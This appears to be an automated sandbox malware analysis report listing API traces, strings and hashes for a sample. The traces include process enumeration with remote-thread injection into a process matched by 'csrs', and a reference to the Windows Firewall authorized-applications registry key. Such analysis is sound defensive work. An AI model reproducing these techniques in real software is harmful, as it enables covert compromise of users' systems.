CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 006207C9
Process32First.KERNEL32 ref: 006207DC
Process32Next.KERNEL32 ref: 006207ED
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00620805
CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00620842
CloseHandle.KERNELBASE(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 0062085D
CloseHandle.KERNEL32 ref: 0062086C

Strings

csrs, xrefs: 0062082C

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess32$AdjustFirstFreeLibraryLookupNextOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
String ID: csrs
API String ID: 3908997113-2321902090
Opcode ID: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
Instruction ID: 433a8f3ae285678310bf14c62dc6cbc29417924331ab8289fee92d48ec8e0363
Opcode Fuzzy Hash: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
Instruction Fuzzy Hash: B2113030505625BBFB255F21DD49BBF3EAEEF44701F00402DF94A99142C6B49F019E6A

Function 004010B0 Relevance: 4.7, APIs: 3, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#1134.MFC42(00000000), ref: 004010D0

Part of subcall function 004011F0: #324.MFC42(00000066,00000000,?,?,00000000,00405C38,000000FF,004010ED,00000000), ref: 00401214
Part of subcall function 004011F0: #1168.MFC42(00000066,00000000,?,?,00000000), ref: 00401227
Part of subcall function 004011F0: #1146.MFC42(00000080,0000000E,00000080,00000066,00000000,?,?,00000000), ref: 00401238
Part of subcall function 004011F0: LoadIconA.USER32(00000000,00000080), ref: 0040123E

#2514.MFC42(00000000), ref: 004010FD
#641.MFC42(00000000), ref: 004011AA

Memory Dump Source

Source File: 00000015.00000002.2064830909.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.2064795062.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064865379.0000000000406000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064896028.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064927902.000000000040A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064959905.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064992453.0000000000414000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065024303.000000000041A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065055495.000000000041B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065086646.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065150592.0000000000429000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065181608.000000000042E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065213605.0000000000430000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065247297.0000000000436000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065278608.0000000000437000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065314228.000000000043C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065345921.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065376800.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065412995.0000000000444000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065444222.0000000000445000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065477000.000000000044A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065510299.000000000044C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065543439.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065574043.0000000000453000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065609286.0000000000458000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065641477.000000000045A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065672358.000000000045B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065703455.0000000000460000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065733984.0000000000461000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065770490.0000000000466000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065800883.0000000000468000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065830355.0000000000469000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065861085.000000000046E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065891278.000000000046F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065923953.0000000000474000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065955831.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065987198.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066018174.000000000047C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066052063.000000000047D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066082716.0000000000482000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_hrlA367.jbxd

Yara matches

Similarity

API ID: #1134#1146#1168#2514#324#641IconLoad
String ID:
API String ID: 684539369-0
Opcode ID: d0dbdc0e91b82d1144f430ae13d057aa2d360b1f2b28aa11f9f2600f3695659b
Instruction ID: e887a676387cd3a6316cff733c1d11cddbc99e07af3dfecb023e529bfa9dd79e
Opcode Fuzzy Hash: d0dbdc0e91b82d1144f430ae13d057aa2d360b1f2b28aa11f9f2600f3695659b
Instruction Fuzzy Hash: 07F09671854618EBC724EFA4CC42B9DB778FB05724F10033EE815A36C1EB785605CB85

Function 00405B10 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#1576.MFC42(004035C3,004035C3,004035C3,004035C3,004035C3,00000000,?,0000000A), ref: 00405B20

Memory Dump Source

Source File: 00000015.00000002.2064830909.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.2064795062.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064865379.0000000000406000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064896028.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064927902.000000000040A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064959905.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064992453.0000000000414000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065024303.000000000041A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065055495.000000000041B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065086646.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065150592.0000000000429000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065181608.000000000042E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065213605.0000000000430000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065247297.0000000000436000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065278608.0000000000437000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065314228.000000000043C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065345921.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065376800.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065412995.0000000000444000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065444222.0000000000445000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065477000.000000000044A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065510299.000000000044C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065543439.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065574043.0000000000453000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065609286.0000000000458000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065641477.000000000045A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065672358.000000000045B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065703455.0000000000460000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065733984.0000000000461000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065770490.0000000000466000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065800883.0000000000468000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065830355.0000000000469000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065861085.000000000046E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065891278.000000000046F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065923953.0000000000474000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065955831.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065987198.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066018174.000000000047C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066052063.000000000047D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066082716.0000000000482000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_hrlA367.jbxd

Yara matches

Similarity

API ID: #1576
String ID:
API String ID: 1976119259-0
Opcode ID: 47d5a98b55b57ba85a66e84109f2227387a3d22cae08d4c422bb556fe884a3cf
Instruction ID: d2ca0a3b883f0518e56937479b7600124a2c67ba881e6fa747779e696d41ac8e
Opcode Fuzzy Hash: 47d5a98b55b57ba85a66e84109f2227387a3d22cae08d4c422bb556fe884a3cf
Instruction Fuzzy Hash: 36B0087601C786ABDB02DE91880192BBAA2BB98704F485C1DB2A1140A187768478EB16

Function 00482CAE Relevance: 1.3, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000004,CA1AE9E0,?,?,?,?,?,?,?,?,?,?,?,?,?,07704390), ref: 00482C82

Memory Dump Source

Source File: 00000015.00000002.2066082716.0000000000482000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.2064795062.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064830909.0000000000401000.00000020.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064865379.0000000000406000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064896028.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064927902.000000000040A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064959905.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064992453.0000000000414000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065024303.000000000041A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065055495.000000000041B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065086646.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065150592.0000000000429000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065181608.000000000042E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065213605.0000000000430000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065247297.0000000000436000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065278608.0000000000437000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065314228.000000000043C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065345921.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065376800.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065412995.0000000000444000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065444222.0000000000445000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065477000.000000000044A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065510299.000000000044C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065543439.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065574043.0000000000453000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065609286.0000000000458000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065641477.000000000045A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065672358.000000000045B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065703455.0000000000460000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065733984.0000000000461000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065770490.0000000000466000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065800883.0000000000468000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065830355.0000000000469000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065861085.000000000046E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065891278.000000000046F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065923953.0000000000474000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065955831.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065987198.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066018174.000000000047C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066052063.000000000047D000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_hrlA367.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 2941891f3795c6f05a293b06209a9f50f08dfe53ecc95c981ceb5e51ef49c74a
Instruction ID: a1d831deead5511c42865662fe48a5713adfdc2882c533367e09d43fbcf8ea79
Opcode Fuzzy Hash: 2941891f3795c6f05a293b06209a9f50f08dfe53ecc95c981ceb5e51ef49c74a
Instruction Fuzzy Hash: 2621797A5056219FCB15FA19DA822EDB3E1FF41724B501D1FFA818B201C6A89E47C7CA

Function 00482C65 Relevance: 1.3, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000004,CA1AE9E0,?,?,?,?,?,?,?,?,?,?,?,?,?,07704390), ref: 00482C82

Memory Dump Source

Source File: 00000015.00000002.2066082716.0000000000482000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.2064795062.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064830909.0000000000401000.00000020.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064865379.0000000000406000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064896028.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064927902.000000000040A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064959905.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064992453.0000000000414000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065024303.000000000041A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065055495.000000000041B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065086646.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065150592.0000000000429000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065181608.000000000042E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065213605.0000000000430000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065247297.0000000000436000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065278608.0000000000437000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065314228.000000000043C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065345921.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065376800.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065412995.0000000000444000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065444222.0000000000445000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065477000.000000000044A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065510299.000000000044C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065543439.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065574043.0000000000453000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065609286.0000000000458000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065641477.000000000045A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065672358.000000000045B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065703455.0000000000460000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065733984.0000000000461000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065770490.0000000000466000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065800883.0000000000468000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065830355.0000000000469000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065861085.000000000046E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065891278.000000000046F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065923953.0000000000474000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065955831.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065987198.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066018174.000000000047C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066052063.000000000047D000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_hrlA367.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 2ef6b8e0adac193261cfa0d2a5bee3fdbc2c21d07b809aa780d6ca7f1990f43e
Instruction ID: 91acae21fac1e4a6c4b2e5db99c7eb7ecfa0cfdef3ce7ae895fde2adf8682098
Opcode Fuzzy Hash: 2ef6b8e0adac193261cfa0d2a5bee3fdbc2c21d07b809aa780d6ca7f1990f43e
Instruction Fuzzy Hash: C3E0D8365246189ECA10BA59EE524DD77E1FEC1724B504E1BE581460419B142E4797CA

Function 006205BA Relevance: 1.3, APIs: 1, Instructions: 7sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(0000000A,0062085C,?,00000000,00000000,-00003C38,00000002,00000000,?,00000000), ref: 006205C1

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 3c1f989dfd13240381299ec7adf5382b251643946d8aa86ca05208ab7bb78418
Instruction ID: 1995448df91c11655b7e35f5ad4549aff7238c710e58d2d15a2b44631638ce87
Opcode Fuzzy Hash: 3c1f989dfd13240381299ec7adf5382b251643946d8aa86ca05208ab7bb78418
Instruction Fuzzy Hash: AFB0122824071095FA140910660DB0416267F00B11FE00059F2066C0C507E407011C09

Non-executed Functions

Function 00623C3D Relevance: 46.0, APIs: 21, Strings: 5, Instructions: 487libraryloaderCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(020a00 . . :#a260b0403 +*,00000104), ref: 00623CA1
GetProcAddress.KERNEL32(00000000,00000002), ref: 00623CD4
GetProcAddress.KERNEL32(00000000,00623D41), ref: 00623D4C
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00623D5F
GetTickCount.KERNEL32 ref: 00623D93
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00626EF6,00000000,00000000,00000000,00000000), ref: 00623E65
GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#a260b0403 +*,000000C8), ref: 00623EE2

Strings

C:\USERS\user\APPDATA\LOCAL\SYSTEMRESOURCES\HRLA367.TMP.MUN, xrefs: 006241DA
020a00 . . :#a260b0403 +*, xrefs: 00623CA0, 00623D06, 00623D16, 00623EDF, 00623EF4, 00623F0B, 00624195, 006241DB
C:,, xrefs: 00623EF6, 00623F08
ADVAPI32.DLL, xrefs: 00623D5E
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00623F0C

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: AddressProc$CountDirectoryFileInformationLibraryLoadModuleNameTickVolumeWindows
String ID: 020a00 . . :#a260b0403 +*$ADVAPI32.DLL$C:,$C:\USERS\user\APPDATA\LOCAL\SYSTEMRESOURCES\HRLA367.TMP.MUN$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 1749273276-2126123959
Opcode ID: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
Instruction ID: 9686eb37e835eba57ca9fc3fe635cb560c48eb3413f9f2a6ef6d08adbe526383
Opcode Fuzzy Hash: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
Instruction Fuzzy Hash: BF020471508668BFEB259F24AC0ABEA7BADEF41300F00451DEC499F182D7F45F458BA6

Function 00623CC2 Relevance: 44.2, APIs: 20, Strings: 5, Instructions: 432libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00623CBA), ref: 00623CC2
GetProcAddress.KERNEL32(00000000,00000002), ref: 00623CD4
GetProcAddress.KERNEL32(00000000,00623D41), ref: 00623D4C
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00623D5F
GetTickCount.KERNEL32 ref: 00623D93

Strings

C:\USERS\user\APPDATA\LOCAL\SYSTEMRESOURCES\HRLA367.TMP.MUN, xrefs: 006241DA
020a00 . . :#a260b0403 +*, xrefs: 00623D16, 00623EDF, 00623EF4, 00623F0B, 00624195, 006241DB
C:,, xrefs: 00623EF6, 00623F08
ADVAPI32.DLL, xrefs: 00623D5E
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00623F0C

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: AddressProc$CountHandleLibraryLoadModuleTick
String ID: 020a00 . . :#a260b0403 +*$ADVAPI32.DLL$C:,$C:\USERS\user\APPDATA\LOCAL\SYSTEMRESOURCES\HRLA367.TMP.MUN$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 2837544101-2126123959
Opcode ID: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
Instruction ID: b855e10cce06d21d4ce12ed9eeda7800841905188b9aad1667ca36872942227e
Opcode Fuzzy Hash: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
Instruction Fuzzy Hash: FAE12371508668BFEB259F24AC1ABEA7BADEF41300F00451DEC498E182D7F45F458BA5

Function 00623CF0 Relevance: 44.2, APIs: 20, Strings: 5, Instructions: 409COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00623CE5), ref: 00623CF0
GetSystemDirectoryA.KERNEL32(020a00 . . :#a260b0403 +*,00000104), ref: 00623D07

Part of subcall function 00623D1F: lstrcat.KERNEL32(020a00 . . :#a260b0403 +*,00623D12), ref: 00623D20
Part of subcall function 00623D1F: GetProcAddress.KERNEL32(00000000,00623D41), ref: 00623D4C
Part of subcall function 00623D1F: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00623D5F
Part of subcall function 00623D1F: GetTickCount.KERNEL32 ref: 00623D93
Part of subcall function 00623D1F: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00626EF6,00000000,00000000,00000000,00000000), ref: 00623E65

Strings

C:\USERS\user\APPDATA\LOCAL\SYSTEMRESOURCES\HRLA367.TMP.MUN, xrefs: 006241DA
020a00 . . :#a260b0403 +*, xrefs: 00623D06, 00623D16, 00623EDF, 00623EF4, 00623F0B, 00624195, 006241DB
C:,, xrefs: 00623EF6, 00623F08
ADVAPI32.DLL, xrefs: 00623D5E
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00623F0C

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: AddressCountDirectoryHandleInformationLibraryLoadModuleProcSystemTickVolumelstrcat
String ID: 020a00 . . :#a260b0403 +*$ADVAPI32.DLL$C:,$C:\USERS\user\APPDATA\LOCAL\SYSTEMRESOURCES\HRLA367.TMP.MUN$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 215653160-2126123959
Opcode ID: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
Instruction ID: 9c15a6135af06ea68eed38e66590967a2724b4dedff14192887d9629bceb03d3
Opcode Fuzzy Hash: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
Instruction Fuzzy Hash: 27E11271408668BFEB25AF24EC1ABEA7BADEF41300F00455DEC498E182D7F45F458BA5

Function 00623D1F Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 389stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(020a00 . . :#a260b0403 +*,00623D12), ref: 00623D20

